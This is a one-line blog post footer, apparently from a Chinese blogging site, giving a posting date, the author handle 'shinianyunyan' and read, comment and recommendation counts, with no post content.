posted @ 2025-12-02 09:19 shinianyunyan 阅读(29) 评论(0) 推荐(0)